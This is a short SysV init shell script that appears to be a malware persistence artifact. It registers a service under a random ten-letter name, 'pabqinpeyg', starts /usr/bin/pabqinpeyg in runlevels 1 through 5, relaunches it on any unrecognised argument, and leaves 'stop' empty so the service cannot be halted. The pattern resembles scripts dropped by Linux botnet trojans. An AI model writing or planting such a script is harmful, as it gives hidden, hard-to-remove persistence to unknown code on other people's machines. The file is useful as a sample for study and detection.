#!/bin/sh
# chkconfig: 12345 90 90
# description: pabqinpeyg
### BEGIN INIT INFO
# Provides:		pabqinpeyg
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	pabqinpeyg
### END INIT INFO
case $1 in
start)
	/usr/bin/pabqinpeyg
	;;
stop)
	;;
*)
	/usr/bin/pabqinpeyg
	;;
esac
